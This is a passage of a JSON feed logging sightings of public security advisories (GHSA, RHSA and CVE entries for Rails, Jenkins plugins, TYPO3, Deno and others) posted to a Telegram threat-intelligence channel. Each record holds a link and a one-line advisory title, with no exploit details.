possible ReDoS vulnerability in Accept header parsing in Action Dispatch", "creation_timestamp": "2024-02-27T22:56:34.000000Z"}, {"uuid": "9728f9fe-fb4e-4ff1-99cd-ad5aaf53c488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-33W6-HVMQ-GH4X", "type": "seen", "source": "https://t.me/ctinow/194912", "content": "https://ift.tt/1cktfz8\n[GHSA-33w6-hvmq-gh4x] diffoscope Path Traversal vulnerability", "creation_timestamp": "2024-02-27T22:56:35.000000Z"}, {"uuid": "3346815d-6324-4167-a1d8-890e2e47ec45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H22-8CF7-HQ6G", "type": "seen", "source": "https://t.me/ctinow/194910", "content": "https://ift.tt/rCVSKj2\n[GHSA-8h22-8cf7-hq6g] Rails has possible Sensitive Session Information Leak in Active Storage", "creation_timestamp": "2024-02-27T22:56:33.000000Z"}, {"uuid": "f907e50d-1665-49c7-8082-baec280443c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9822-6M93-XQF4", "type": "seen", "source": "https://t.me/ctinow/194909", "content": "https://ift.tt/2LicMbT\n[GHSA-9822-6m93-xqf4] Rails has possible XSS Vulnerability in Action Controller", "creation_timestamp": "2024-02-27T22:56:32.000000Z"}, {"uuid": "7ac7ee61-b216-4731-8d13-b0c1c11e06b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MR9J-QQJH-67F2", "type": "seen", "source": "https://t.me/ctinow/201795", "content": "https://ift.tt/yt6r2js\n[GHSA-mr9j-qqjh-67f2] Jenkins Subversion Partial Release Manager Plugin missing permission check", "creation_timestamp": "2024-03-06T20:46:37.000000Z"}, {"uuid": "e46439c1-5c16-4c28-92be-c4964c465e9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J74-G3C5-WQWW", "type": "seen", "source": "https://t.me/ctinow/201794", "content": "https://ift.tt/kMxJRv7\n[GHSA-5j74-g3c5-wqww] Jenkins GitBucket Plugin vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-03-06T20:46:36.000000Z"}, {"uuid": "be888c32-fe20-45da-8b50-fdd0f8d59e18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RV35-69FF-G9GV", "type": "seen", "source": "https://t.me/ctinow/201793", "content": "https://ift.tt/yqUjsbL\n[GHSA-rv35-69ff-g9gv] Jenkins Subversion Partial Release Manager Plugin vulnerable to Cross-Site Request Forgery", "creation_timestamp": "2024-03-06T20:46:35.000000Z"}, {"uuid": "a6d7b05c-0e2e-4d2d-b8a6-30ba11e3abb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5J5R-6MV9-M255", "type": "seen", "source": "https://t.me/ctinow/201776", "content": "https://ift.tt/67eiqRX\n[GHSA-5j5r-6mv9-m255] Jenkins Build Monitor View Plugin vulnerable to stored Cross-site Scripting", "creation_timestamp": "2024-03-06T20:31:23.000000Z"}, {"uuid": "7223ac9a-72f7-4931-9453-e81cd5bba211", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FM4-R23P-V68V", "type": "seen", "source": "https://t.me/ctinow/201775", "content": "https://ift.tt/XftkeoK\n[GHSA-8fm4-r23p-v68v] Jenkins MQ Notifier Plugin exposes sensitive information in build logs", "creation_timestamp": "2024-03-06T20:31:21.000000Z"}, {"uuid": "86928fd8-907e-480e-b10b-de72767c865f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4RM-X2RR-357W", "type": "seen", "source": "https://t.me/ctinow/201774", "content": "https://ift.tt/TliBDRA\n[GHSA-m4rm-x2rr-357w] Jenkins Bitbucket Branch Source Plugin has incorrect trust policy behavior for pull requests", "creation_timestamp": "2024-03-06T20:31:20.000000Z"}, {"uuid": "4b913824-566c-4f85-a39b-7e0fdb4cf074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CGQF-3CQ5-WVCJ", "type": "seen", "source": "https://t.me/ctinow/201707", "content": "https://ift.tt/6SExbDK\n[GHSA-cgqf-3cq5-wvcj] Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", "creation_timestamp": "2024-03-06T19:32:20.000000Z"}, {"uuid": "8a0897a0-a81d-4988-9e83-b55377b2186b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCWV-XWC9-5HP2", "type": "seen", "source": "https://t.me/ctinow/201639", "content": "https://ift.tt/ip40Joc\nCVE-2023-48229 | Contiki-NG up to 4.9 nrf-ieee-driver-arch.c read_frame out-of-bounds write (GHSA-rcwv-xwc9-5hp2)", "creation_timestamp": "2024-03-06T18:46:46.000000Z"}, {"uuid": "a0445d85-05cc-4767-a54a-3218302441a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1192", "type": "seen", "source": "https://t.me/ctinow/201536", "content": "https://ift.tt/TEOIuQ5\nRHSA-2024:1192: Moderate: Red Hat JBoss Enterprise Application Platform 8.0.1 security update", "creation_timestamp": "2024-03-06T17:16:41.000000Z"}, {"uuid": "cc545240-c9f1-4d94-9512-c8e8622606b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1193", "type": "seen", "source": "https://t.me/ctinow/201535", "content": "https://ift.tt/IDFLkRS\nRHSA-2024:1193: Moderate: Red Hat JBoss Enterprise Application Platform 8.0.1 security update", "creation_timestamp": "2024-03-06T17:16:40.000000Z"}, {"uuid": "e90ba75d-44ef-4a7f-9169-176584e7a6fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8VCG-V7G4-3VR7", "type": "seen", "source": "https://t.me/ctinow/201747", "content": "https://ift.tt/y9iTDQY\n[GHSA-8vcg-v7g4-3vr7] Jenkins HTML Publisher Plugin does not properly sanitize input", "creation_timestamp": "2024-03-06T20:16:28.000000Z"}, {"uuid": "2f95dbf1-98fc-4035-92b7-22d475c78377", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4M7H-34XM-4WJV", "type": "seen", "source": "https://t.me/ctinow/201601", "content": "https://ift.tt/1q7Thvk\n[GHSA-4m7h-34xm-4wjv] Concrete CMS Stored Cross-site Scripting vulnerability", "creation_timestamp": "2024-03-06T18:16:39.000000Z"}, {"uuid": "60971795-ca3e-4f85-9b09-a4e331c84fbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WQW-HR4F-XRHH", "type": "seen", "source": "https://t.me/ctinow/201600", "content": "https://ift.tt/E6RivVa\n[GHSA-2wqw-hr4f-xrhh] RSSHub Cross-site Scripting vulnerability caused by internal media proxy", "creation_timestamp": "2024-03-06T18:16:38.000000Z"}, {"uuid": "ec386dd5-00dc-496f-9bd6-38af6378ecb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P3P-CGJ7-VGW3", "type": "seen", "source": "https://t.me/ctinow/201599", "content": "https://ift.tt/oqjSchb\n[GHSA-3p3p-cgj7-vgw3] RSSHub vulnerable to Server-Side Request Forgery", "creation_timestamp": "2024-03-06T18:16:37.000000Z"}, {"uuid": "c304ce14-6e39-4b31-9e9f-1088df2c53fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1194", "type": "seen", "source": "https://t.me/ctinow/201534", "content": "https://ift.tt/uFa4NKz\nRHSA-2024:1194: Moderate: Red Hat JBoss Enterprise Application Platform 8.0.1 security update", "creation_timestamp": "2024-03-06T17:16:39.000000Z"}, {"uuid": "a6e7642c-56fb-47b8-81f3-ba19faa07b46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1153", "type": "seen", "source": "https://t.me/ctinow/200597", "content": "https://ift.tt/AYh18G9\nRHSA-2024:1153: Important: squid security update", "creation_timestamp": "2024-03-05T19:21:54.000000Z"}, {"uuid": "0eca2093-5f00-4d41-90c5-51ef2a0f5fa6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XFW-JJQ2-7V8H", "type": "seen", "source": "https://t.me/ctinow/196401", "content": "https://ift.tt/FkgG7qc\nCVE-2024-24768 | 1Panel up to 1.9.5 cleartext transmission (GHSA-9xfw-jjq2-7v8h)", "creation_timestamp": "2024-02-29T09:27:11.000000Z"}, {"uuid": "02c022d1-e0dd-4f22-b8a8-b94b0331e2d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XG5P-8WG5-RHXM", "type": "seen", "source": "https://t.me/ctinow/201502", "content": "https://ift.tt/vYzGQX9\n[GHSA-xg5p-8wg5-rhxm] Phone information disclosure vulnerability", "creation_timestamp": "2024-03-06T16:46:37.000000Z"}, {"uuid": "596f1d45-5585-4c1f-9411-aebd38cb2a5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-26W3-Q4J8-4XJP", "type": "seen", "source": "https://t.me/ctinow/201496", "content": "https://ift.tt/bRfvM1J\n[GHSA-26w3-q4j8-4xjp] 1Panel open source panel project has an unauthorized vulnerability.", "creation_timestamp": "2024-03-06T16:32:00.000000Z"}, {"uuid": "ffef5cab-2194-4764-af62-0c90d344c7bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C69X-5XMW-V44X", "type": "seen", "source": "https://t.me/ctinow/201494", "content": "https://ift.tt/SiMgxNd\n[GHSA-c69x-5xmw-v44x] CasaOS Improper Restriction of Excessive Authentication Attempts vulnerability", "creation_timestamp": "2024-03-06T16:31:58.000000Z"}, {"uuid": "531d041b-7976-4ecc-97af-07f76e6ca7f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5GF-CMM8-CG7C", "type": "seen", "source": "https://t.me/ctinow/201495", "content": "https://ift.tt/ZNopYKj\n[GHSA-h5gf-cmm8-cg7c] CasaOS-UserService allows unauthorized access to any file", "creation_timestamp": "2024-03-06T16:31:59.000000Z"}, {"uuid": "486cc93d-d241-42fd-b6ad-e83f9cf4102c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C967-2652-GFJM", "type": "seen", "source": "https://t.me/ctinow/201493", "content": "https://ift.tt/OgMnUh5\n[GHSA-c967-2652-gfjm] CasaOS Username Enumeration", "creation_timestamp": "2024-03-06T16:31:57.000000Z"}, {"uuid": "df2296db-7b2c-4f5d-892e-e755ccf6b9db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9P43-HJ5J-96H5", "type": "seen", "source": "https://t.me/ctinow/201492", "content": "https://ift.tt/CihHS8X\n[GHSA-9p43-hj5j-96h5] esphome vulnerable to stored Cross-site Scripting in edit configuration file API", "creation_timestamp": "2024-03-06T16:31:56.000000Z"}, {"uuid": "67c555bd-cb03-45d6-84b6-067dd45fea98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C2F9-4JMM-V45M", "type": "seen", "source": "https://t.me/ctinow/201486", "content": "https://ift.tt/qS7uZeb\n[GHSA-c2f9-4jmm-v45m] Shopware's session is persistent in Cache for 404 pages", "creation_timestamp": "2024-03-06T16:21:40.000000Z"}, {"uuid": "0bfc7f0e-30c5-4015-bd31-9a8cb2e83d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1037", "type": "seen", "source": "https://t.me/ctinow/201485", "content": "https://ift.tt/WxmkXwf\nRHSA-2024:1037: Important: OpenShift Container Platform 4.13.36 bug fix and security update", "creation_timestamp": "2024-03-06T16:16:37.000000Z"}, {"uuid": "53ed1a3f-c074-47a2-9d7c-e2ebd2f9a104", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1108", "type": "seen", "source": "https://t.me/ctinow/200458", "content": "https://ift.tt/WmdjyxB\nRHSA-2024:1108: Moderate: gnutls security update", "creation_timestamp": "2024-03-05T17:16:55.000000Z"}, {"uuid": "ba2bc197-e138-4f05-b518-3de8f4c028f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1188", "type": "seen", "source": "https://t.me/ctinow/201373", "content": "https://ift.tt/SE9pFH5\nRHSA-2024:1188: Moderate: kernel security, bug fix, and enhancement update", "creation_timestamp": "2024-03-06T14:16:34.000000Z"}, {"uuid": "ad56fcb1-a7e1-49ca-8f86-1acce3c6a119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38R2-5695-334W", "type": "seen", "source": "https://t.me/ctinow/201082", "content": "https://ift.tt/VNYEORZ\nCVE-2024-25118 | TYPO3 Backend Forms information disclosure (GHSA-38r2-5695-334w)", "creation_timestamp": "2024-03-06T08:06:58.000000Z"}, {"uuid": "e35c50da-5d26-4d1c-8c46-b17abd473ccf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H47M-3F78-QP9G", "type": "seen", "source": "https://t.me/ctinow/201081", "content": "https://ift.tt/ErpPKlT\nCVE-2024-25119 | TYPO3 Install Tool information disclosure (GHSA-h47m-3f78-qp9g)", "creation_timestamp": "2024-03-06T08:06:57.000000Z"}, {"uuid": "daec24d6-d342-401c-a9af-0dfc5299fdc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WF85-8HX9-GJ7C", "type": "seen", "source": "https://t.me/ctinow/201071", "content": "https://ift.tt/EIqXY9p\nCVE-2024-25120 | TYPO3 t3 Scheme access control (GHSA-wf85-8hx9-gj7c)", "creation_timestamp": "2024-03-06T07:36:25.000000Z"}, {"uuid": "4e936a07-33f8-49f1-8766-2059403c6948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M4PQ-FV2W-6HRW", "type": "seen", "source": "https://t.me/ctinow/200748", "content": "https://ift.tt/VQOTv2f\n[GHSA-m4pq-fv2w-6hrw] Deno's deno_runtime vulnerable to interactive permission prompt spoofing via improper ANSI stripping", "creation_timestamp": "2024-03-05T22:06:55.000000Z"}, {"uuid": "51e0ed68-d9e2-466e-8fa7-80dfd00876fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WRQV-PF6J-MQJP", "type": "seen", "source": "https://t.me/ctinow/200743", "content": "https://ift.tt/ynOJpHs\n[GHSA-wrqv-pf6j-mqjp] Deno's Node.js Compatibility Runtime has Cross-Session Data Contamination", "creation_timestamp": "2024-03-05T21:53:01.000000Z"}, {"uuid": "6598cf40-e68c-4e0c-81b0-8302e269b753", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65X7-C272-7G7R", "type": "seen", "source": "https://t.me/ctinow/200481", "content": "https://ift.tt/bCa16XR\n[GHSA-65x7-c272-7g7r] Use After Free in SixLabors.ImageSharp", "creation_timestamp": "2024-03-05T17:36:37.000000Z"}, {"uuid": "5527da72-020d-4401-ab77-b0f634e475c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-86FC-F9GR-V533", "type": "seen", "source": "https://t.me/ctinow/200480", "content": "https://ift.tt/Aw7bxHk\n[GHSA-86fc-f9gr-v533] HTTP Handling Vulnerability in the Bare server", "creation_timestamp": "2024-03-05T17:36:35.000000Z"}, {"uuid": "980ecba2-2ca7-429b-832f-c69717f46440", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V627-69V2-XX37", "type": "seen", "source": "https://t.me/ctinow/200479", "content": "https://ift.tt/IDSfLeh\n[GHSA-v627-69v2-xx37] `GetRepositoryByName`, `DeleteRepositoryByName` and `GetArtifactByName` allow access of arbitrary repositories in Minder by any authenticated user", "creation_timestamp": "2024-03-05T17:36:34.000000Z"}, {"uuid": "fe777298-cdc0-4fb1-8412-3df18169a51d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M3R6-H7WV-7XXV", "type": "seen", "source": "https://t.me/ctinow/191158", "content": "https://ift.tt/NQgDnmS\nCVE-2024-23651 | moby buildkit up to 0.12.4 race condition (GHSA-m3r6-h7wv-7xxv)", "creation_timestamp": "2024-02-22T20:51:39.000000Z"}, {"uuid": "fc1fe252-76f2-4d9d-9d60-e737bec5e6da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4V98-7QMW-RQR8", "type": "seen", "source": "https://t.me/ctinow/191157", "content": "https://ift.tt/0e7ap9T\nCVE-2024-23652 | moby buildkit up to 0.12.4 path traversal (GHSA-4v98-7qmw-rqr8)", "creation_timestamp": "2024-02-22T20:51:39.000000Z"}, {"uuid": "1e0efd4e-3d95-4603-8664-6b58448cba9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1027", "type": "seen", "source": "https://t.me/ctinow/195823", "content": "https://ift.tt/pF1MobA\nRHSA-2024:1027: Moderate: Migration Toolkit for Applications security update", "creation_timestamp": "2024-02-28T20:16:55.000000Z"}, {"uuid": "994401e1-e43c-4288-8389-099ceac83303", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0174", "type": "seen", "source": "https://t.me/ctinow/195821", "content": "https://ift.tt/XpbDuKt\nCVE-2019-18660 | Linux Kernel up to 5.3.13 Spectre-RSB Mitigation entry_64.S information disclosure (RHSA-2020:0174)", "creation_timestamp": "2024-02-28T20:16:53.000000Z"}, {"uuid": "012b8a29-3882-4f23-aa28-5b9049193a39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8MQ4-9JJH-9XRC", "type": "seen", "source": "https://t.me/ctinow/195813", "content": "https://ift.tt/a5wfcKn\n[GHSA-8mq4-9jjh-9xrc] YARD's default template vulnerable to Cross-site Scripting in generated frames.html", "creation_timestamp": "2024-02-28T20:06:37.000000Z"}, {"uuid": "f25afbbc-31b0-4417-b36f-592f4443362d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR6G-9WCR-CMQJ", "type": "seen", "source": "https://t.me/ctinow/195812", "content": "https://ift.tt/gtbahE5\n[GHSA-wr6g-9wcr-cmqj] Apache Superset: Improper data authorization when creating a new dataset", "creation_timestamp": "2024-02-28T20:06:35.000000Z"}, {"uuid": "5c2989b8-47b4-46df-a339-9ee24e275281", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2023:7200", "type": "seen", "source": "https://t.me/ctinow/195726", "content": "https://ift.tt/Nt7PHi3\nRHSA-2023:7200: Important: OpenShift Container Platform 4.15.z security update", "creation_timestamp": "2024-02-28T18:22:28.000000Z"}, {"uuid": "d7ed21d6-c929-4d0b-a6d6-fbefa76c9932", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0954", "type": "seen", "source": "https://t.me/ctinow/195724", "content": "https://ift.tt/twWBQrg\nRHSA-2024:0954: Important: Red Hat OpenShift for Windows Containers 10.15.0 security update", "creation_timestamp": "2024-02-28T18:22:26.000000Z"}, {"uuid": "2b9b44bd-f0cd-4c73-b89c-41ee27b019b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0946", "type": "seen", "source": "https://t.me/ctinow/195548", "content": "https://ift.tt/NQbwYyk\nRHSA-2024:0946: Important: OpenShift Container Platform 4.13.35 security update", "creation_timestamp": "2024-02-28T15:16:27.000000Z"}, {"uuid": "3fc1948b-1c00-4e63-9e9f-0ccb9772459a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRQR-JV8W-V9JH", "type": "seen", "source": "https://t.me/ctinow/200475", "content": "https://ift.tt/f80NdyW\n[GHSA-hrqr-jv8w-v9jh] Insufficient permission checking in `Deno.makeTemp*` APIs", "creation_timestamp": "2024-03-05T17:31:47.000000Z"}, {"uuid": "f27acc5c-483b-4e4d-a8be-ab5110fcd20b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1075", "type": "seen", "source": "https://t.me/ctinow/199821", "content": "https://ift.tt/4LygIk9\nRHSA-2024:1075: Important: edk2 security update", "creation_timestamp": "2024-03-05T02:17:29.000000Z"}, {"uuid": "45da7616-01c6-405e-a2b3-0324c19bd02e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1076", "type": "seen", "source": "https://t.me/ctinow/199820", "content": "https://ift.tt/NoHrLcF\nRHSA-2024:1076: Important: edk2 security update", "creation_timestamp": "2024-03-05T02:17:28.000000Z"}, {"uuid": "51058c85-ec02-4440-b03f-4c4ec96ba25b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1077", "type": "seen", "source": "https://t.me/ctinow/199819", "content": "https://ift.tt/CRIdcDZ\nRHSA-2024:1077: Important: edk2 security update", "creation_timestamp": "2024-03-05T02:17:28.000000Z"}, {"uuid": "9c896491-26db-43b8-98f6-5dcfadbfd7a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1078", "type": "seen", "source": "https://t.me/ctinow/199818", "content": "https://ift.tt/2VLZkrU\nRHSA-2024:1078: Moderate: Service Telemetry Framework 1.5.4 security update", "creation_timestamp": "2024-03-05T02:17:26.000000Z"}, {"uuid": "001cf568-1bf5-4fa9-ad0a-7c4dbfeb364c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FGXV-GW55-R5FQ", "type": "seen", "source": "https://t.me/ctinow/199624", "content": "https://ift.tt/kanDZRP\n[GHSA-fgxv-gw55-r5fq] Authorization Bypass Through User-Controlled Key in go-zero", "creation_timestamp": "2024-03-04T21:56:36.000000Z"}, {"uuid": "fda62266-46ff-49ac-9f1a-6a398c410fba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HG35-MP25-QF6H", "type": "seen", "source": "https://t.me/ctinow/199623", "content": "https://ift.tt/xCwsz9f\n[GHSA-hg35-mp25-qf6h] phpseclib a large prime can cause a denial of service", "creation_timestamp": "2024-03-04T21:56:35.000000Z"}, {"uuid": "c602c59e-ea10-4045-b5f6-8ade2a986979", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JR22-8QGM-4Q87", "type": "seen", "source": "https://t.me/ctinow/199622", "content": "https://ift.tt/qb7v0DG\n[GHSA-jr22-8qgm-4q87] phpseclib does not properly limit the ASN1 OID length", "creation_timestamp": "2024-03-04T21:56:33.000000Z"}, {"uuid": "9a7db197-3fb1-40d4-b02c-9a463c6337ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1071", "type": "seen", "source": "https://t.me/ctinow/199603", "content": "https://ift.tt/pfXT4sh\nRHSA-2024:1071: Important: postgresql:12 security update", "creation_timestamp": "2024-03-04T21:16:54.000000Z"}, {"uuid": "aef1f01c-e397-4af7-b14d-5ee1110366d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3QR-QR4X-J273", "type": "seen", "source": "https://t.me/ctinow/189958", "content": "https://ift.tt/KPubCf1\n[GHSA-f3qr-qr4x-j273] php-svg-lib lacks path validation on font through SVG inline styles", "creation_timestamp": "2024-02-21T19:16:55.000000Z"}, {"uuid": "6d49b7c2-f1bd-48c0-9cc1-226f59bd0515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1066", "type": "seen", "source": "https://t.me/ctinow/199133", "content": "https://ift.tt/WtNFESw\nRHSA-2024:1066: Important: squid:4 security update", "creation_timestamp": "2024-03-04T10:16:52.000000Z"}, {"uuid": "1364129a-f792-456a-87e8-cc1499d1ec0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24RP-Q3W6-VC56", "type": "seen", "source": "https://t.me/ctinow/190263", "content": "https://ift.tt/JBbHFaY\n[GHSA-24rp-q3w6-vc56] org.postgresql:postgresql vulnerable to SQL Injection via line comment generation", "creation_timestamp": "2024-02-22T00:46:22.000000Z"}, {"uuid": "ae94c7a0-48ff-4d96-bfeb-62cab0b1a811", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H86-8MV2-JQ9F", "type": "seen", "source": "https://t.me/ctinow/190079", "content": "https://ift.tt/51ejG7s\nCVE-2024-23334 | aio-libs aiohttp up to 3.9.1 Symbolic Links path traversal (GHSA-5h86-8mv2-jq9f)", "creation_timestamp": "2024-02-21T21:16:49.000000Z"}, {"uuid": "328b3b3c-9c68-427e-8755-7e75a600fb6d", "vulnerability_lookup_origin": 